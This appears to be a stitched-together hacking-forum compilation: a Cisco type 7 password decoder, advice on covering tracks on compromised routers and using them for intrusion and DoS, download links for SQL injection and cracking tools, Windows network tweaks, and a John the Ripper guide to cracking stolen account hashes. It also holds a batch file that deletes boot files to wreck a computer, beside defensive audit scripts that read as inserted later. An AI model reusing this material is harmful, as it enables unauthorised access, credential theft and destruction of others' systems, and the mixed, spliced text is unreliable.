    /* Copy the config through, replacing each type 7 string with its plaintext. */
    while (fgets(line, sizeof(line), in) != NULL) {
        line[strcspn(line, "\r\n")] = 0;
        pw_pos = 0;

        if (!strncmp(line, pw_str1, strlen(pw_str1)))
            pw_pos = strlen(pw_str1);
        if (!strncmp(line, pw_str2, strlen(pw_str2)))
            pw_pos = strlen(pw_str2);

        if (!pw_pos) {
            fprintf(out, "%s\n", line);
            continue;
        }

        if (cdecrypt(&line[pw_pos], passwd, sizeof(passwd))) {
            fprintf(stderr, "Error.\n");
            exit(1);
        }
        fprintf(out, "%.*s%s\n", (int)pw_pos, line, passwd);
    }

    fclose(in);
    fclose(out);
    return 0;
}

If you do not have Linux, then the only way to break the password is to run a dictionary or brute-force attack on
the file with John the Ripper or another password-cracker.
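
Seen from the defending side, the decoder above means that type 7 strings are reversible and have to be treated as cleartext. The following Python audit is an added example, not part of the original tutorial: the sample configuration is constructed, and the "enable password", "enable secret", "username" and "transport input" forms it recognises are IOS syntax assumed beyond the two prefixes the listing matches.

```python
import re

# "password"/"secret" keyword, optional one-digit type, then the value.
# Matches the listing's "password 7 " and "enable-password 7 " prefixes as
# well as the assumed "enable password/secret" and "username ..." forms.
CRED_RE = re.compile(r"\b(password|secret)\s+(?:([0-9])\s+)?(\S+)\s*$")
# Type 7 layout used by the listing: two decimal digits, then hex byte pairs.
TYPE7_RE = re.compile(r"^([0-9]{2})((?:[0-9A-Fa-f]{2})+)$")
HASHED_TYPES = {"5", "8", "9"}  # one-way hash types, not reported

# Constructed sample configuration (not taken from a real device).
SAMPLE_CONFIG = """\
service password-encryption
hostname lab-rtr1
enable secret 5 $1$CONSTRUCTED$notarealhashvalue000000
enable password 7 0822455D0A16
username ops password 7 1511021F0725
username guest password guest123
line vty 0 4
 password 7 99ZZ
 transport input telnet
"""


def parse_type7(value):
    """Return (key offset, plaintext length) for a well-formed type 7
    string, or None. The offset limit of 15 is the check cdecrypt() applies."""
    m = TYPE7_RE.match(value)
    if not m:
        return None
    offset = int(m.group(1))
    if offset > 15:
        return None
    return offset, len(m.group(2)) // 2


def audit_config(text):
    """Return (line number, category, detail) findings. Secret values are
    never echoed into the report."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("!"):
            continue
        if line.startswith("transport input"):
            protocols = line.split()[2:]
            if "telnet" in protocols or "all" in protocols:
                findings.append((lineno, "telnet-enabled", line))
            continue
        m = CRED_RE.search(line)
        if not m:
            continue
        keyword, ptype, value = m.groups()
        if ptype is None or ptype == "0":
            findings.append((lineno, "cleartext", keyword + " stored in the clear"))
        elif ptype == "7":
            parsed = parse_type7(value)
            if parsed is None:
                findings.append((lineno, "type7-malformed", "not a valid type 7 string"))
            else:
                offset, length = parsed
                findings.append((lineno, "type7-reversible",
                                 "key offset %d, reveals a %d-character password"
                                 % (offset, length)))
        elif ptype not in HASHED_TYPES:
            findings.append((lineno, "unknown-type", "type " + ptype))
    return findings


if __name__ == "__main__":
    for finding in audit_config(SAMPLE_CONFIG):
        print("line %d: %s (%s)" % finding)
```

Every "type7-reversible" finding is a credential to rotate and re-enter as a one-way hashed secret; the report also shows that the format leaks the password length even before decoding.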

-------------------------------

Section 5: using the router

To use this wonderful piece of technology, you will have to be able to connect to it, use a proxy if you do not want
your IP logged. Once you have logged in, you'll want to disable the history so no one can look at what you were
doing, type in "terminal history size 0". Now it won't remember anything! Type "?" for a list of all of the router's
commands, and you will be able to use most of them.

These routers usually have telnet, so you can use telnet to connect to other systems, (like unix boxes) and hack
into them. It also is equipped with ping and traceroute, which you can use to trace systems or do DoS attacks. You
may also be able to use it to intercept packets, but I do not recommend this, as it will not always work, and may
get you noticed....

---------------------------------

If you don't hack a cisco your first time, don't worry... you probably won't do it the first time, or even the
second. It takes practice and patience. This is just to show you how... And make sure you are going after something
that is LEGAL.

--------------------------
Exploiting Cisco Systems
(Even From Windows!)

Triton

This program is what is known as an "exploiter". It can be used to probe websites for possible vulnerabilities based on user-customisable pre-defined lists. This is a follow up to the popular -=[Triton 0.3]=- program with a great number of improvements.

This program should only be used against sites where you have the permission to do so.

Written By Rhino

Download:

http://project2025.com/Triton.zip


XSS & SQL inject Addon tools for Firefox Browser

Exploit-Me is a set of Firefox plugins to test for reflected Cross-Site Scripting and SQL Injection vulnerabilities in web applications.

The tools are designed to be lightweight, extensible and easy to use.



Bsqlbf V2 - Blind Sql Injection Brute Forcer Tool

There are quite a lot of SQL Injection Tools available and now there is one more to add to the stable for testing - Bsqlbf V2, which is a Blind SQL Injection Brute Forcer.

The original tool (bsqlbfv1.2-th.pl) was intended to exploit blind sql injection against a mysql backend database, this new version supports blind sql injection against the following databases:

* MS-SQL
* MY-SQL
* PostgreSQL
* Oracle

It supports injection in string and integer fields. The feature which separates this tool from all other sql injection tools is that it supports custom SQL queries to be supplied with the -sql switch.

It supports 2 modes of attack:

1. Type 0: Blind SQL Injection based on True And False response
2. Type 1: Blind SQL Injection based on True And Error Response(details)

You can download Bsqlbf V2 here:

http://bsqlbf-v2.googlecode.com/files/bsqlbf-v2.1.zip

Total Spoof version 1.44



This is my favorite spoofer, I used to use it way back. All you do is enter the ref and tar and save it to your list then click spoof site and there it loads.


Features

Editing
TotalSpoof gives you complete control and flexibility in managing your spoof list.

Delete Duplicates
Deletes all duplicates in the currently loaded list.

Favorites
Allows you to mark your favorite spoofs for easy location. Your favorite spoofs are displayed with an icon.

Sorting your List
This feature is useful if you have a large list: simply clicking on the column headers will sort your list, or, if you want to sort by your favorites, right-click in the list.

Load/Save/Export/Import
Allows you to have multiple lists and flexibility in your spoofing environment.

QuickSpoof
If you want to test a spoof then use this feature first, and if the spoof is successful you have the option to add the new spoof to your list for saving.

Spoof validating/scanner
This is not 100%, more like 90% successful, but what it attempts to do is visit each site in your list and scan the resulting page for common errors like 'access denied'. You have the option to delete bad sites as they are found or to mark the site with the dead icon.




http://rapidshare.com/files/96758068/TotalSpoof144.rar

password: www.imafia.net

CForce V1.00, Cracking-Too

In my opinion the best crackingtool.
It can handle basic, form and some strongbox logins.

http://rs385tl2.rapidshare.com/files/110120925/CForce_1.00.rar

Password: by_WaKo

AccessDiver

You can find this program at www.accessdiver.com

The deface-Sql injection

http://rs376tl2.rapidshare.com/files/127530532/SQL_Injection_Tool_v2.1a.rar

Sql Injection Dorks


If anyone asks how to use these, they are not ready to use this

Have fun
I will post dos commands and stuff soon


C-Sploiter Final

A very good Exploiter


Rar Pass:

http://www.imafia.net

13,000+ base urls for multi-site exploiting rs

http://rapidshare.com/files/115667429/urls.rar

WSTOOL : Web vulnerable scan tool

Web vulnerabilities scan tool - SQL injection -XSS Cross Site Scripting - 404/500 server error -Admin/Manage folder search - web-based or command-line scanner.


Make ur Internet n Bandwidth Rapid - Rapid Speeds 100% works

Here are Registry Tweaks and Scroll down to see Patches

1.Increase bandwidth by tweaking QoS in Windows XP Pro

The following tweak applies only to Windows XP Professional edition.

The default system behavior is that all 100% bandwidth is available, however, if there is a running application that indicates to the OS it needs to send high priority/real time data, then as long as it has the socket open, Windows XP will restrict “best effort” traffic to 80% of the bandwidth so that high priority traffic can be accommodated. Basically, applications can make this request to the operating system for QoS support using the QoS application programming interfaces (APIs) in Windows and this only applies if a specific app is requesting QoS.

If you'd like to change how much bandwidth is reserved for QoS (the default is 20% of the total bandwidth), do the following:

1. Make sure you're logged in as "Administrator" (not just any account with admin privileges).
2. Navigate to START>Run and type: gpedit.msc
3. Navigate to Local Computer Policy > Administrative Templates > Network > QOS Packet Scheduler
4. In the right window, double-click the limit reservable bandwidth setting
5. On the setting tab, check the enabled setting.
6. Where it says "Bandwidth limit %", change it to read 0 (or whatever percentage you want to reserve for high priority QoS data)
7. Click OK, close gpedit.msc

Under START > My Computer > My Network Connections > View Network Connections, right-click on your connection and under Properties (where it lists your protocols), make sure QOS Packet Scheduler is enabled.



The tweak described below helps boost priority for DNS & hostname resolution in general. What this means is, it helps web pages load faster, and has negligible effect on downloads (not counting the couple of ms gain with the host resolution at connect-time).

Applying this tweak assumes some proficiency in editing the Windows Registry using Regedit (Start > Run > type: regedit). As always, backup your Registry before making any changes so you can revert to the previous state if you don't like the results.


2.Host Resolution Priority Tweak
host name resolution priority
Windows 2k/XP

First, open the Windows Registry using Regedit, and (after backing up) navigate to:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\ServiceProvider



Note the following lines (all hex dwords):
Class = 008 (8) - indicates that TCP/IP is a name service provider, don't change.

LocalPriority = 1f3 (499) - local names cache
HostsPriority = 1f4 (500) - the HOSTS file
DnsPriority = 7d0 (2000) - DNS
NetbtPriority = 7d1 (2001) - NetBT name-resolution, including WINS

What we're aiming to do is increase the priority of the last 4 settings, while keeping their order. The valid range is from -32768 to +32767 and lower numbers mean higher priority compared to other services. What we're aiming at is lower numbers without going to extremes, something like what's shown below should work well:

Change the "Priority" lines to:
LocalPriority = 005 (5) - local names cache
HostsPriority = 006 (6) - the HOSTS file
DnsPriority = 007 (7) - DNS
NetbtPriority = 008 (8) - NetBT name-resolution, including WINS

Windows 9x/ME

The tweak is essentially the same as in Windows 2000/XP, just the location in the Registry is slightly different. For a more detailed description see the Windows 2000/XP section above.

Open the Windows Registry using Regedit, and (after backing up) navigate to:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\MSTCP\ServiceProvider

You should see the following settings:
Class=hex:08,00,00,00

LocalPriority=hex:f3,01,00,00
HostsPriority=hex:f4,01,00,00
DnsPriority=hex:d0,07,00,00
NetbtPriority=hex:d1,07,00,00

The "priority" lines should be changed to:
LocalPriority=hex:05,00,00,00
HostsPriority=hex:06,00,00,00
DnsPriority=hex:07,00,00,00
NetbtPriority=hex:08,00,00,00

Reboot for changes to take effect.


In addition to the tweaks already covered in Win 2k/XP Registry Tweaks and More Win 2k/XP Tweaks, the Windows XP Service Pack 2 introduces a few new issues covered in the article below. Please make sure you understand what you are doing before making any changes to your Operating System. Note the information below only applies to Windows XP Service Pack 2.



3.Remove the limit on TCP connection attempts

Windows XP SP2 introduces a few new twists to TCP/IP in order to babysit users and "reduce the threat" of worms spreading fast without control. In one such attempt, the devs seem to have limited the number of possible TCP connection attempts per second to 10 (from unlimited in SP1). This argumentative feature can possibly affect server and P2P programs that need to open many outbound connections at the same time.

Rant: The forward thinking of Microsoft developers here is that you can only infect 10 new systems per second via TCP/IP ?!?... If you also consider that each of those infected computers will infect 10 others at the same rate:
second 1: 1+10 computers
second 2: 10+10*10 computers (110 new ones)
second 3: 10+100*10 computers ( 1110 new ones)
second 4: 10+1000*10 computers (11110 new ones)
....
all the way to 10*60 + 10^60 computers in a single minute (that's a number with 60 digits, or it would far exceed Earth's population). Even if we consider that 90% of those computers are unreachable/protected, one would still reach ALL of them within a minute.

In other words, even though it is not going to stop worm spreading, it's going to delay it a few seconds, limit possible network congestion a bit, and limit the use of your PC to 10 connection attempts per second in the process! I have no problem with the new default setting limiting outbound connection attempts. Still, users should have the option to easily disable or change this setting. I might be going out on a limb here, but ever since the introduction of Windows XP I can't help thinking that I dislike all the built-in Windows "wizardry" in a sense that the system also limits user access. That irritating trend to ease the mental load on end users is somewhat insulting, considering that Windows is to make the more "intelligent" choice instead of the end user, as well as limit their access to tuning such settings...
End of rant.

With the new implementation, if a P2P or some other network program attempts to connect to 100 sites at once, it would only be able to connect to 10 per second, so it would take it 10 seconds to reach all 100. In addition, even though the setting was registry editable in XP SP1, it is now only possible to edit by changing it directly in the system file tcpip.sys. To make matters worse, that file is in use, so you also need to be in Safe mode in order to edit it.

You only need to worry about the number of connection attempts per second if you have noticed a slowdown in network programs requiring a number of connections opened at once. You can check if you're hitting this limit from the Event Viewer, under System - look for TCP/IP Warnings saying: "TCP/IP has reached the security limit imposed on the number of concurrent TCP connect attempts". Keep in mind this is a cap only on incomplete outbound connect attempts per second, not total connections. Still, running servers and P2P programs can definitely be affected by this new limitation. Use the fix as you see fit.

To change or remove the limit, you can use the following program:

Event ID 4226 Patcher v2.11

http://www.speedguide.net/files/xp_sp2/EvID4226Patch211a-en.zip

- A patching program for removing or changing the limit imposed on connection attempts in SP2. The patcher has the ability to restore tcpip.sys back to the original... Still, you might want to back up tcpip.sys, use it at your own risk. The author of this patch can be reached @ http://www.lvllord.de/

4. Recommended settings for Windows 2000 / XP
Windows 2000 & XP, unlike NT, support large windows as described in RFC1323 (the 'RcvWindow' has a maximum value of 2**30 rather than 64K), and include some other improvements over their predecessors that you can use to speed up any TCP/IP transfers. The descriptions and other options are added to provide you with better understanding and enable you to customize your settings.

All the following entries, unless otherwise noted should be placed in the Windows 2000/XP Registry under the key

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters

TCPWindowSize

The value of TCP Window in the Windows 2000 Registry is DWORD, representing number of bytes, with range from 0 to 2^30. The recommended values (in red) optimize TCP for any high speed Internet connection and work best in most cases, however if you'd like to use a custom value follow these guidelines:

For best results, the TCPWindow should be a multiple of MSS (Maximum Segment Size). MSS is generally MTU - 40, where MTU (Maximum Transmission Unit) is the largest packet size that can be transmitted. MTU is usually 1500 (1492 for PPPoE connections). To determine the MTU value of your ISP, check out the Advanced Registry Editing section of our site.

There are three places in the Windows 2000 Registry where you can add the TCP Window parameter.

HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
GlobalMaxTcpWindowSize="256960" (DWORD, number of bytes) Valid range is from MSS to 2^30. Add the value as a decimal. Note: For best results RWIN has to be a multiple of MSS lower than 65535 times a scale factor that's a power of 2, i.e. 44 x 1460 = 64240 x 2^2 = 256960. If you choose to use a RWIN lower than 65535, you can simply make it multiple of MSS and turn scaling off (Tcp1323Opts=0)

HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
TcpWindowSize="256960" (DWORD, number of bytes) Valid range is from MSS to 2^30. Add the value as a decimal. TcpWindowSize can also exist under Tcpip\Parameters\Interfaces\<interface ID> - if added at this location, it overrides the global setting for this particular interface. Note (10/20/00): Seems MS has found another bug in Windows 2000, the TCPWindowSize should be configured with the global setting (GlobalMaxTcpWindowSize) rather than this one - Q263088

Note: For best results RWIN has to be a multiple of MSS lower than 65535 times a scale factor that's a power of 2, i.e. 44 x 1460 = 64240 x 2^2 = 256960. If you choose to use a RWIN lower than 65535, you can simply make it multiple of MSS and turn scaling off (Tcp1323Opts=0)

Tcp1323Opts

Tcp1323Opts is a necessary setting in order to enable Large TCPWindow support as described in RFC 1323. Without this parameter, the TCPWindow is limited to 64K.

HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
Tcp1323Opts="1" (DWORD, recommended setting is 1. The possible settings are 0 - Disable RFC 1323 options, 1 - Window scaling but no Timestamp options, 3 - Window scaling and Time stamp options.)

Note: Tcp1323Opts="3" might help in some cases where there is increased packet loss, however generally you'll achieve better throughput with Tcp1323Opts="1", since Timestamps add 12 bytes to the header of each packet.

DefaultTTL

DefaultTTL determines the time in seconds and the number of hops a packet lives. While it does not directly affect speed, a larger value increases the amount of time it takes for a packet to be considered lost, discarded and retransmitted. A value that's too small can cause packets to be unable to reach distant servers at all.

HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
DefaultTTL="64" (DWORD, recommended setting is 64. Other settings that are widely used are 128 and 32)

EnablePMTUDiscovery

When set to 1 (True), TCP attempts to discover MTU automatically over the path to a remote host. Setting this parameter to 0 causes MTU to default to 576 which reduces overall performance over high speed connections. Note that this setting is different than our Windows 9x recommendation.

HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
EnablePMTUDiscovery="1" (DWORD - boolean, valid settings are 0-->False and 1-->True. Many connections perform better with this entry at 1, however, if you prefer to set your upstream to send fixed 1500 packets, you might want to use 0 instead). When set at 1, establishing connections and initial transfer speed might slow down a bit, however you will get better throughput if somewhere in the path large packets need to be fragmented.

EnablePMTUBHDetect

Setting this parameter to 1 (True) enables "black hole" routers to be detected, however it also increases the maximum number of retransmissions for a given segment. In most cases you'd want to keep BHDetect to 0 (False).

HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
EnablePMTUBHDetect="0" (DWORD - boolean, valid settings are 0-->False and 1-->True. Recommended setting is 0)

SackOpts

This parameter controls whether or not SACK (Selective Acknowledgement) support is enabled, as specified in RFC 2018. SACK is especially important for connections using large TCP Window sizes.

HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
SackOpts="1" (DWORD - boolean, recommended setting is 1. Possible settings are 0 - No Sack options or 1 - Sack Option enabled).

TcpMaxDupAcks

This parameter determines the number of duplicate ACKs that must be received for the same sequence number of sent data before "fast retransmit" is triggered to resend the segment that has been dropped in transit.

HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
TcpMaxDupAcks="2" (DWORD - range 1-3, recommended setting is 2).
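
The rules given in this section (RWIN as a multiple of MSS times a power-of-2 scale factor, scaling required above 64K, and the valid values of each parameter) can be checked before anything is written to the Registry. The Python check below is an added example, not code from the original article; the function names, the 1-255 TTL bound and the choice to treat a missing Tcp1323Opts as 0 are assumptions of the example.

```python
BOOLEAN_KEYS = ("EnablePMTUDiscovery", "EnablePMTUBHDetect", "SackOpts")
WINDOW_KEYS = ("GlobalMaxTcpWindowSize", "TcpWindowSize")

# The values recommended in the text above.
RECOMMENDED = {
    "GlobalMaxTcpWindowSize": 256960,
    "TcpWindowSize": 256960,
    "Tcp1323Opts": 1,
    "DefaultTTL": 64,
    "EnablePMTUDiscovery": 1,
    "EnablePMTUBHDetect": 0,
    "SackOpts": 1,
    "TcpMaxDupAcks": 2,
}


def find_window_scale(rwin, mss):
    """Return (segments, shift) such that rwin == segments * mss * 2**shift
    with segments * mss <= 65535, or None if rwin does not fit the rule."""
    for shift in range(15):  # RFC 1323 limits the shift count to 14
        base, rem = divmod(rwin, 1 << shift)
        if rem:
            break  # larger powers of two cannot divide rwin either
        if 0 < base <= 65535 and base % mss == 0:
            return base // mss, shift
    return None


def check_tcp_params(params, mtu=1500):
    """Return a list of (parameter, problem) pairs; empty means consistent."""
    mss = mtu - 40  # MSS is generally MTU - 40, as stated above
    issues = []

    opts = params.get("Tcp1323Opts", 0)  # assumption: absent means 0
    if opts not in (0, 1, 3):
        issues.append(("Tcp1323Opts", "must be 0, 1 or 3"))

    for key in WINDOW_KEYS:
        if key not in params:
            continue
        rwin = params[key]
        if not mss <= rwin <= 2 ** 30:
            issues.append((key, "outside the range MSS..2^30"))
        elif find_window_scale(rwin, mss) is None:
            issues.append((key, "not a multiple of MSS %d times a power of 2" % mss))
        elif rwin > 65535 and opts not in (1, 3):
            issues.append((key, "above 64K but window scaling is off"))

    for key in BOOLEAN_KEYS:
        if key in params and params[key] not in (0, 1):
            issues.append((key, "must be 0 or 1"))

    if "TcpMaxDupAcks" in params and not 1 <= params["TcpMaxDupAcks"] <= 3:
        issues.append(("TcpMaxDupAcks", "valid range is 1-3"))

    if "DefaultTTL" in params and not 1 <= params["DefaultTTL"] <= 255:
        issues.append(("DefaultTTL", "must be between 1 and 255"))

    return issues


if __name__ == "__main__":
    print(find_window_scale(256960, 1460))  # the 44 x 1460 x 2^2 case above
    print(check_tcp_params(RECOMMENDED))
    print(check_tcp_params({"GlobalMaxTcpWindowSize": 256960, "Tcp1323Opts": 0}))
```

Pass mtu=1492 for a PPPoE connection so that the MSS used in the check is 1452.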



Patches


This Includes


1. sguide_tweak_2k.zip

Description: Generic patch for Windows XP and Windows 2000 (all versions). This patch will optimize your TCP/IP Registry settings for high speed Internet connections. To install, extract the .inf file first, then double-click (or right-click on filename and choose install from the pull-down menu) and reboot for changes to take effect.

http://www.speedguide.net/files/sguide_tweak_2k.zip

2.sguide_tweak_2k_pppoe.zip
Description: Generic patch for Windows XP/2000 and DSL connections using PPPoE. This patch will optimize your TCP/IP Registry settings for high speed Internet connections. It is specifically designed for PPPoE DSL connections. To install, extract the .inf file first, then double-click (or right-click on filename and choose install from the pull-down menu) and reboot for changes to take effect.

http://www.speedguide.net/files/sguide_tweak_2k_pppoe.zip

3. winxp_dnscache.zip

Description: Patch Windows 2k/XP not to cache failed DNS entries. By default, when a DNS lookup fails (due to temporary DNS problems), Windows still caches the unsuccessful DNS query, and in turn fails to connect to a host regardless of the fact that the DNS server might be able to handle your lookup seconds later. This patch fixes the problem by configuring the DNS client to continue sending queries to an unresponsive network. To install, save to your HD, unzip the .reg file, then double-click the filename.

Web Patches - faster loading of Web Pages
The following patch increases Web page loading speed, by doubling the number of possible concurrent open connections. For example, imagine a web page has 20 images and some text - in order for your browser to get all these files, it opens 2 or 4 concurrent connections, depending on the Web server. Increasing the number of open connections allows for faster retrieving of the data. Please note that the patch sets some values outside of the HTML specs. If you decide to install it, backup your Registry first. Changes will take effect after you reboot. Download the patch appropriate for your OS:

OS: Windows 9x/ME

http://www.speedguide.net/files/sg_webtweak_9x.zip

OS: Windows 2K/XP/2k3

http://www.speedguide.net/files/sg_webtweak_2k.zip

TCP OPTIMISER
Description: The TCP Optimizer is a free, easy Windows program that provides an intuitive interface for tuning and optimizing your Internet connection. Just download and run, there is no installation required. The program makes it easy to find the best MTU and RWIN values, test latency and tweak all the important broadband related registry parameters. The Optimizer can be helpful with tuning any Internet connection type, from dialup to Gigabit+

URL http://www.speedguide.net/files/TCPOptimizer.exe





Tuesday, 26 August 2008

Access Diver-Tutorial, Videotutorial

http://rapidshare.com/files/110803323/Access_Diver_Tutorial.rar

Password: www.imafia.net

Caecus tutorial, OCR cracking


Learn how to Crack - The Complete Cracking

Basically this rar includes a number of files that walk u through the steps of cracking an actual program! ... Plus you get lots of cracking tools with this one rar file

Note: Read the rar comments for the password.

http://rapidshare.com/files/35301440/TCCG_MaxGrab.rar

Shutdown a computer forever

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

Copy the code into TXT and save it as .Bat

Do not run the program on your computer.
If you did, choose recovery mode using the WinXP CD ROM.

JTR Decrypting Video Tutorial

http://rapidshare.com/files/118746650/JTR_Decrypting_Video_Tutorial.rar

JTR tutorial

Ok, this tutorial is about John the Ripper, often shortened to JTR. JTR is a password cracker for UNIX style passwords. You will need JTR to crack accounts extracted from cc*ill.LOG's or passwd files. This tutorial can be used by the novice user, but maybe the more experienced users can discover some new dimensions too.
The accounts which JTR can crack must have the following format:
Fabian:56FgemjhWD9g6
colsen:99lu/CUMikgxM
ibunton:52plhWx7Iv.Cg
tommyb:90rhlDur.3ofE
Minutolo:86c9kUFc/2qxE
schwange:92LsZO7AsKIZA
^^user^^:^^^^hash^^^^^
The "weird" characters after the ':' are called the hash. A hash is nothing more than a code/number generated from a string of text. These hashes can be cracked with JTR. The DES hashes which are used in cc*ill.logs are always 13 chars long.
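
For auditing your own account files, the 13-character format described above can be recognised mechanically, which shows how many accounts still rely on legacy DES hashes and how many of them share a salt (the first two characters of the hash). The Python check below is an added example, not part of the original tutorial; the sample records are constructed placeholders, not real hashes, and the function name is an assumption.

```python
import re
from collections import defaultdict

# Traditional DES crypt: 13 characters from [./0-9A-Za-z]; the first two
# characters are the salt.
DES_CRYPT_RE = re.compile(r"^[./0-9A-Za-z]{13}$")

# Constructed sample records (format-valid placeholders, not real hashes).
SAMPLE_LINES = [
    "alice:" + "ab" + "A" * 11,
    "bob:" + "ab" + "B" * 11,                      # same salt as alice
    "carol:" + "Zq" + "c" * 11 + ":1001:100::/home/carol:/bin/sh",
    "dave:$6$saltsalt$" + "d" * 20,                # modular crypt, not DES
    "erin:" + "ab" + "!" * 11,                     # 13 chars, bad alphabet
    "no-separator-line",
]


def audit_hash_lines(lines):
    """Classify user:hash records (extra passwd fields are ignored).

    Returns a dict with the users on DES crypt, the users on another
    "$id$" scheme, the line numbers that could not be parsed, the number
    of distinct DES salts and the salts shared by several users.
    """
    report = {"des_crypt": [], "other_scheme": [], "malformed": []}
    by_salt = defaultdict(list)

    for lineno, raw in enumerate(lines, 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        user, sep, rest = line.partition(":")
        hash_field = rest.split(":", 1)[0]
        if not sep or not user or not hash_field:
            report["malformed"].append(lineno)
        elif DES_CRYPT_RE.match(hash_field):
            report["des_crypt"].append(user)
            by_salt[hash_field[:2]].append(user)
        elif hash_field.startswith("$"):
            report["other_scheme"].append(user)
        else:
            report["malformed"].append(lineno)

    report["distinct_salts"] = len(by_salt)
    report["shared_salts"] = {s: u for s, u in by_salt.items() if len(u) > 1}
    return report


if __name__ == "__main__":
    result = audit_hash_lines(SAMPLE_LINES)
    print("DES crypt accounts to migrate:", result["des_crypt"])
    print("distinct salts:", result["distinct_salts"])
    print("salts shared by several users:", result["shared_salts"])
```

Accounts reported under "des_crypt" are the ones to move to a modern salted scheme and to force a password change on.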
WORDLIST MODE
JTR has different cracking modes. One of the fastest ways is to use a wordlist. The wordlist has to be a single wordlist and NOT a combolist. To make your own single wordlist (text file containing one word per line), you could think of using dictionaries of different languages, family names, pet names, movie names, etc. I will supply some links where you can find such wordlists.
To let JTR work with a wordlist you run JTR like this (in a command-window):
john -wordfile:WORDLIST.TXT PORN_ACCOUNTS.TXT
where WORDLIST.TXT is your wordlist file, and PORN_ACCOUNTS.TXT is the file containing the usernames and hashes like shown above.
You can do a more advanced way of wordlist cracking by supplying a
-rules parameter like this:
john -wordfile:WORDLIST.TXT -rules PORN_ACCOUNTS.TXT
This mode will take some more time, but the chance to crack more accounts increases quite a lot. In this mode JTR will test each word in the wordlist including variations of that word, like adding a number before or after the word, removing vowels and other nifty tricks.
Here you have a screenshot if you start john cracking with a wordlist:
Loaded 945 passwords with 97 different salts (Traditional DES [64/64 BS MMX])
forest5 (temptor)
tomato (marley)
guesses:2 time: 0:00:00:08 0% c/s:109080040 trying: aljarfa - alkamin
anubis (jbwein)
guesses:3 time: 0:00:00:23 1% c/s:109082277 trying: berozo - berryton
Session aborted

If JTR is busy, you can hit [space] to display the current status. As seen in the above screenshot, you will get a status line with the number of guesses so far, how long JTR has been running (days:hours:minutes:seconds), the progress indicator, the speed in combinations of login and password per second and the current password tries. If JTR c*a* an account it will show you the password first and between the ( ) the loginname. If you have enough passes and you want to quit JTR, use ctrl-break (do NOT press ctrl-c twice, because that will not save your results to JTR's history (.POT file) and the restore file). In windows I have the experience that CTRL-C will not save the session either. You have explicitly use the Ctrl-Break combination!
If you have aborted JTR and want to let JTR resume the c*a*, you can restore the interrupted session with this: john -restore
If you want to see which accounts JTR has been c*a*, you use the option -show: john -show PORN_ACCOUNTS.TXT
To save the c*a* accounts to a file, you can use the standard redirection: john -show PORN_ACCOUNTS.TXT > c*a*.txt
SINGLE c*a* MODE
This is the most easiest and probably fastest mode you should try first on your password files. It uses the logins to construct passwords with many different rules.
john -single PORN_ACCOUNTS.TXT
INCREMENTAL CRACK MODE
This is the most advanced and powerful cracking mode of JTR. In this mode JTR will try every possible character combination. With a maximum password length of around 8, it will seem that JTR never finishes its session. It will end eventually, but that can take months, even years. JTR uses some advanced methods when trying every possible character combination, such as character frequency tables, to improve the chance of success.
There are different character sets which you can use. The charsets which are delivered with JTR are the following:
All : this character set contains 95 different chars (all letters, numbers, chars like !@#$%^&*()_+)
Alpha : this character set contains 26 different chars (a to z)
Digits : this character set contains 10 different chars (0 to 9)
LanMan : this character set contains 65 different chars, and is primarily used for cracking LanMan passwords, which are used by WindowsNT.
If you don't specify a charset, JTR will choose the default incremental mode, which is 'All'.
john -i PORN_ACCOUNTS.TXT
john -i:digits PORN_ACCOUNTS.TXT
john -i:alpha PORN_ACCOUNTS.TXT
Some tips - some are advanced
1. If you sort your wordlist alphabetically, JTR will run a little faster. Another advantage of sorting is that JTR can detect dupes by itself.
2. Although the maximum length of the password is normally 8 chars, don't remove or truncate the words in the wordlist which are longer than 8 chars. The rest may be needed by the -rules option (think of the vowel-removing rule). John is, by the way, smart enough not to test the same password twice if the list is sorted.
3. JTR can make use of wildcards, such as:
john -wordfile:WORDLIST.TXT -rules accounts*.txt
It will load all accounts*.txt files and start cracking all the accounts in them.
4. The number of different salts affects the speed of JTR: the more salts that must be calculated, the slower JTR is. To speed up the whole process you can choose to let JTR try only the salts with a given number of passwords. To test salts with more than 5 passwords, use the following options:
john -wordfile:WORDLIST.TXT -rules -salts:5 PORN_ACCOUNTS.TXT
To test the rest of the salts (those with less than 5 passwords), use a negative count:
john -wordfile:WORDLIST.TXT -rules -salts:-5 PORN_ACCOUNTS.TXT
5. To have more than one session which you can restore, you can save the session under a name of your choice with the option -session:NAME. To restore a specific session use the option -restore:NAME. The status of a cancelled session can be checked with the option -status:NAME:
john -wordfile:WORDLIST.TXT -rules -session:firsttry PORN_ACCOUNTS.TXT
john -restore:firsttry
john -status:firsttry
6. If you have cracked a lot of accounts, it can be more effective to make your own charset. Your custom charset will not only contain the chars used in the cracked passwords, it will also record the character frequencies, making JTR more efficient and faster at cracking passwords. To make your own charset, follow these steps:
a) Make your own charset
john -makechars:THEBEST.CHR PORN_ACCOUNTS.TXT
Loaded 73618 plaintexts
Generating charsets... 1 2 3 4 5 6 7 8 DONE
Generating cracking order... DONE
Successfully written charset file: thebest.chr (65 characters)
b) Edit the config file JOHN.CONF
- search for "[Incremental:All]" and you will see a section like this:
# Incremental modes
[Incremental:All]
File = $JOHN/all.chr
MinLen = 0
MaxLen = 8
CharCount = 95
- here you can add your own section (the CharCount will be given by JTR if you created a custom charset) to the config file
[Incremental:THEBEST]
File = $JOHN/THEBEST.CHR
MinLen = 3
MaxLen = 8
CharCount = 65
c) Now you can run JTR with -i:THEBEST

Easier JTR tut

You can download JTR at http://www.openwall.com/john if you don't have it yet!

Once downloaded, unzip it in a directory you can find easily, for example :

c:\john\

